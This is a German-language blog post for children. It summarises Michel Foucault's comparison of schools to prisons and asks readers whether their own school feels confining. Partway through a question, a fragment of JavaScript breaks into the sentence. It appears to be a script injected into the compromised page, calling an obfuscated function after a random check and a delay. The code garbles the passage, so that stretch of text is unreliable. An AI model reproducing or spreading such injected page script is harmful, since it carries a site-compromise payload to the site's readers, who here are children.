Ein moderner Philosoph, der vor nicht allzu langer Zeit in Frankreich lebte, dachte über die Außenseiter unserer Gesellschaft nach.

Er hieß Michel FOUCAULT.

Er hielt es für eine Frechheit, dass alle Menschen, die keine normalen Erwachsenen waren, also Verrückte, Kranke, Verbrecher, aber auch Kinder, in Gebäude eingesperrt werden.

Er meinte, Kinder werden in Schulen eingesperrt, genauso wie Verbrecher in Gefängnissen eingeschlossen und überwacht werden. Er stellte fest, dass Kinder nichts sagen oder tun dürfen, was die Lehrer nicht erlauben und das gefiel ihm gar nicht.

sains-du-nord-102253_640

Was sagst du dazu?

Ist deine Schule wie ein Gefängnis und deine Lehrer wie Gefängniswärter? Oder ist sie ein Ort, wo du vieles darfst, wo du viel Spaß hast und die Lehrer freundlich sind und verständnisvoll?

Darfst du in der Schule deine Meinung sagen? Kannst du viele Entscheidungen selbst treffen? Musst du dich oft nach andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen richten?

Wenn dich Michel Foucault interessiert, oder Spaß haben, sich nach sich selbst richten… lies weiter bei Gibt es Pippi Langstrumpf in Wirklichkeit?

Comments are closed.